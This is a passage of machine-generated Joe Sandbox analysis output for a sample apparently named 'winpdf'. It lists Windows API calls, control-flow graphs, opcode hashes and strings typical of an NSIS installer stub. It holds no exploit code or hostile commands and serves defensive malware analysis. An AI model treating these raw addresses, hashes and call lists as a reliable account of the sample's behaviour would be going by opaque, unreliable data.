420->430 430->417
                                                                                                                                                                APIs
                                                                                                                                                                • #17.COMCTL32 ref: 004038A2
                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                                                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                                                                                • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                                                                                • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                                                                                • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                                                                                • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                                                                                • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                                                                                • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                                                                                • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                                                                                • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                                                                                • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                                                                                • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                                                                                • API String ID: 2435955865-239407132
                                                                                                                                                                • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                                                                                • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                                                                                • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                                                                                • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 825 4074bb-4074c0 826 4074c2-4074ef 825->826 827 40752f-407547 825->827 828 4074f1-4074f4 826->828 829 4074f6-4074fa 826->829 830 407aeb-407aff 827->830 831 407506-407509 828->831 832 407502 829->832 833 4074fc-407500 829->833 834 407b01-407b17 830->834 835 407b19-407b2c 830->835 837 407527-40752a 831->837 838 40750b-407514 831->838 832->831 833->831 836 407b33-407b3a 834->836 835->836 839 407b61-407c68 836->839 840 407b3c-407b40 836->840 843 4076f6-407713 837->843 841 407516 838->841 842 407519-407525 838->842 856 407350 839->856 857 407cec 839->857 844 407b46-407b5e 840->844 845 407ccd-407cd4 840->845 841->842 849 407589-4075b6 842->849 847 407715-407729 843->847 848 40772b-40773e 843->848 844->839 854 407cdd-407cea 845->854 853 407741-40774b 847->853 848->853 850 4075d2-4075ec 849->850 851 4075b8-4075d0 849->851 855 4075f0-4075fa 850->855 851->855 858 40774d 853->858 859 4076ee-4076f4 853->859 860 407cef-407cf6 854->860 862 407600 855->862 863 407571-407577 855->863 864 407357-40735b 856->864 865 40749b-4074b6 856->865 866 40746d-407471 856->866 867 4073ff-407403 856->867 857->860 868 407845-4078a1 858->868 869 4076c9-4076cd 858->869 859->843 861 407692-40769c 859->861 878 4076a2-4076c4 861->878 879 407c9a-407ca1 861->879 885 407556-40756e 862->885 886 407c7f-407c86 862->886 880 40762a-407630 863->880 881 40757d-407583 863->881 864->854 874 407361-40736e 864->874 865->830 875 407c76-407c7d 866->875 876 407477-40748b 866->876 882 407409-407420 867->882 883 407c6d-407c74 867->883 868->830 871 407c91-407c98 869->871 872 4076d3-4076eb 869->872 871->854 872->859 874->857 888 407374-4073ba 874->888 875->854 884 40748e-407496 876->884 878->868 879->854 887 40768e 880->887 889 407632-40764f 880->889 881->849 881->887 890 407423-407427 882->890 883->854 884->866 894 407498 884->894 885->863 886->854 887->861 892 4073e2-4073e4 888->892 893 4073bc-4073c0 888->893 895 407651-407665 889->895 896 407667-40767a 889->896 890->867 891 407429-40742f 890->891 897 407431-407438 891->897 898 407459-40746b 891->898 902 4073f5-4073fd 892->902 903 4073e6-4073f3 892->903 899 4073c2-4073c5 GlobalFree 893->899 900 4073cb-4073d9 GlobalAlloc 893->900 894->865 901 40767d-407687 895->901 896->901 904 407443-407453 GlobalAlloc 897->904 905 40743a-40743d GlobalFree 897->905 898->884 899->900 900->857 906 4073df 900->906 901->880 907 407689 901->907 902->890 903->902 903->903 904->857 904->898 905->904 906->892 909 407c88-407c8f 907->909 910 40760f-407627 907->910 909->854 910->880
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                                                                                • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 310444273-0
                                                                                                                                                                • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                                                                                • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                                                                                • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 59 405479-40548b 60 405491-405497 59->60 61 4055cd-4055dc 59->61 60->61 62 40549d-4054a6 60->62 63 40562b-405640 61->63 64 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 61->64 67 4054a8-4054b5 SetWindowPos 62->67 68 4054bb-4054be 62->68 65 405680-405685 call 403daf 63->65 66 405642-405645 63->66 64->63 80 40568a-4056a5 65->80 70 405647-405652 call 40139d 66->70 71 405678-40567a 66->71 67->68 72 4054c0-4054d2 ShowWindow 68->72 73 4054d8-4054de 68->73 70->71 90 405654-405673 70->90 71->65 77 405920 71->77 72->73 78 4054e0-4054f5 DestroyWindow 73->78 79 4054fa-4054fd 73->79 88 405922-405929 77->88 83 4058fd-405903 78->83 86 405510-405516 79->86 87 4054ff-40550b SetWindowLongW 79->87 84 4056a7-4056a9 call 40141d 80->84 85 4056ae-4056b4 80->85 83->77 91 405905-40590b 83->91 84->85 93 4056ba-4056c5 85->93 94 4058de-4058f7 KiUserCallbackDispatcher * 2 85->94 95 4055b9-4055c8 call 403dca 86->95 96 40551c-40552d GetDlgItem 86->96 87->88 90->88 91->77 98 40590d-405916 ShowWindow 91->98 93->94 99 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 93->99 94->83 95->88 100 40554c-40554f 96->100 101 40552f-405546 IsWindowEnabled 96->101 98->77 131 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 99->131 132 40571a-405720 99->132 103 405551-405552 100->103 104 405554-405557 100->104 101->77 101->100 109 405582-405587 call 403d18 103->109 110 405565-40556a 104->110 111 405559-40555f 104->111 109->95 113 4055a0-4055ad 110->113 115 40556c-405572 110->115 111->113 114 405561-405563 111->114 113->95 114->109 118 405574-40557a call 40141d 115->118 119 405589-405592 call 40141d 115->119 129 405580 118->129 119->95 127 405594-40559e 119->127 127->129 129->109 135 405761-405762 131->135 136 405764 131->136 132->131 137 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 135->137 136->137 138 405796-4057a7 SendMessageW 137->138 139 4057a9 137->139 140 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 138->140 139->140 140->80 149 4057f3-4057f5 140->149 149->80 150 4057fb-4057ff 149->150 151 405801-405807 150->151 152 40581e-405832 DestroyWindow 150->152 151->77 154 40580d-405813 151->154 152->83 153 405838-405865 CreateDialogParamW 152->153 153->83 155 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 153->155 154->80 156 405819 154->156 155->77 161 4058c4-4058d7 ShowWindow call 403daf 155->161 156->77 163 4058dc 161->163 163->83
                                                                                                                                                                APIs
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                                                                                • ShowWindow.USER32(?), ref: 004054D2
                                                                                                                                                                • DestroyWindow.USER32 ref: 004054E6
                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                                                                                • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                                                                                • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                • String ID: @rD$`7:v
                                                                                                                                                                • API String ID: 3282139019-286069598
                                                                                                                                                                • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                                                                                • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                                                                                • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                                                                                • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 164 4015a0-4015f4 165 4030e3-4030ec 164->165 166 4015fa 164->166 194 4030ee-4030f2 165->194 167 401601-401611 call 4062a3 166->167 168 401742-40174f 166->168 169 401962-40197d call 40145c GetFullPathNameW 166->169 170 4019ca-4019e6 call 40145c SearchPathW 166->170 171 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 166->171 172 401650-40166d call 40137e call 4062a3 call 40139d 166->172 173 4017b1-4017d8 call 40145c call 4062a3 call 405d59 166->173 174 401672-401686 call 40145c call 4062a3 166->174 175 401693-4016ac call 401446 call 4062a3 166->175 176 401715-401731 166->176 177 401616-40162d call 40145c call 4062a3 call 404f72 166->177 178 4016d6-4016db 166->178 179 401736-4030de 166->179 180 401897-4018a7 call 40145c call 4062d5 166->180 181 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 166->181 182 40163c-401645 166->182 183 4016bd-4016d1 call 4062a3 SetForegroundWindow 166->183 167->194 186 401751-401755 ShowWindow 168->186 187 401758-40175f 168->187 225 4019a3-4019a8 169->225 226 40197f-401984 169->226 170->165 231 4019ec-4019f8 170->231 171->165 244 40179a-4017a6 call 4062a3 171->244 172->194 268 401864-40186c 173->268 269 4017de-4017fc call 405d06 CreateDirectoryW 173->269 245 401689-40168e call 404f72 174->245 250 4016b1-4016b8 Sleep 175->250 251 4016ae-4016b0 175->251 176->194 203 401632-401637 177->203 201 401702-401710 178->201 202 4016dd-4016fd call 401446 178->202 179->165 222 4030de call 405f51 179->222 246 4018c2-4018d6 call 4062a3 180->246 247 4018a9-4018bd call 4062a3 180->247 280 401912-401919 181->280 281 40191e-401921 181->281 182->203 204 401647-40164e PostQuitMessage 182->204 183->165 186->187 187->165 206 401765-401769 ShowWindow 187->206 201->165 202->165 203->194 204->203 206->165 222->165 238 4019af-4019b2 225->238 237 401986-401989 226->237 226->238 231->165 237->238 248 40198b-401993 call 4062d5 237->248 238->165 252 4019b8-4019c5 GetShortPathNameW 238->252 263 4017ab-4017ac 244->263 245->165 246->194 247->194 248->225 273 401995-4019a1 call 406009 248->273 250->165 251->250 252->165 263->165 271 401890-401892 268->271 272 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 268->272 284 401846-40184e call 4062a3 269->284 285 4017fe-401809 GetLastError 269->285 271->245 272->165 273->238 280->245 286 401923-40192b call 4062d5 281->286 287 40194a-401950 281->287 294 401853-401854 284->294 291 401827-401832 GetFileAttributesW 285->291 292 40180b-401825 GetLastError call 4062a3 285->292 286->287 301 40192d-401948 call 406c68 call 404f72 286->301 290 401957-40195d call 4062a3 287->290 290->263 299 401834-401844 call 4062a3 291->299 300 401855-40185e 291->300 292->300 294->300 299->294 300->268 300->269 301->290
                                                                                                                                                                APIs
                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                Strings
                                                                                                                                                                • Call: %d, xrefs: 0040165A
                                                                                                                                                                • Rename: %s, xrefs: 004018F8
                                                                                                                                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                • BringToFront, xrefs: 004016BD
                                                                                                                                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                • detailprint: %s, xrefs: 00401679
                                                                                                                                                                • Jump: %d, xrefs: 00401602
                                                                                                                                                                • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                • API String ID: 2872004960-3619442763
                                                                                                                                                                • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                                                                                • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 431 40592c-405944 call 4062fc 434 405946-405956 call 405f51 431->434 435 405958-405990 call 405ed3 431->435 444 4059b3-4059dc call 403e95 call 40677e 434->444 440 405992-4059a3 call 405ed3 435->440 441 4059a8-4059ae lstrcatW 435->441 440->441 441->444 449 405a70-405a78 call 40677e 444->449 450 4059e2-4059e7 444->450 456 405a86-405a8d 449->456 457 405a7a-405a81 call 406805 449->457 450->449 451 4059ed-405a15 call 405ed3 450->451 451->449 458 405a17-405a1b 451->458 460 405aa6-405acb LoadImageW 456->460 461 405a8f-405a95 456->461 457->456 462 405a1d-405a2c call 405d06 458->462 463 405a2f-405a3b lstrlenW 458->463 465 405ad1-405b13 RegisterClassW 460->465 466 405b66-405b6e call 40141d 460->466 461->460 464 405a97-405a9c call 403e74 461->464 462->463 469 405a63-405a6b call 406722 call 406009 463->469 470 405a3d-405a4b lstrcmpiW 463->470 464->460 472 405c35 465->472 473 405b19-405b61 SystemParametersInfoW CreateWindowExW 465->473 481 405b70-405b73 466->481 482 405b78-405b83 call 403e95 466->482 469->449 470->469 477 405a4d-405a57 GetFileAttributesW 470->477 476 405c37-405c3e 472->476 473->466 483 405a59-405a5b 477->483 484 405a5d-405a5e call 406751 477->484 481->476 489 405b89-405ba6 ShowWindow LoadLibraryW 482->489 490 405c0c-405c0d call 405047 482->490 483->469 483->484 484->469 492 405ba8-405bad LoadLibraryW 489->492 493 405baf-405bc1 GetClassInfoW 489->493 494 405c12-405c14 490->494 492->493 495 405bc3-405bd3 GetClassInfoW RegisterClassW 493->495 496 405bd9-405bfc DialogBoxParamW call 40141d 493->496 497 405c16-405c1c 494->497 498 405c2e-405c30 call 40141d 494->498 495->496 502 405c01-405c0a call 403c68 496->502 497->481 500 405c22-405c29 call 40141d 497->500 498->472 500->481 502->476
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
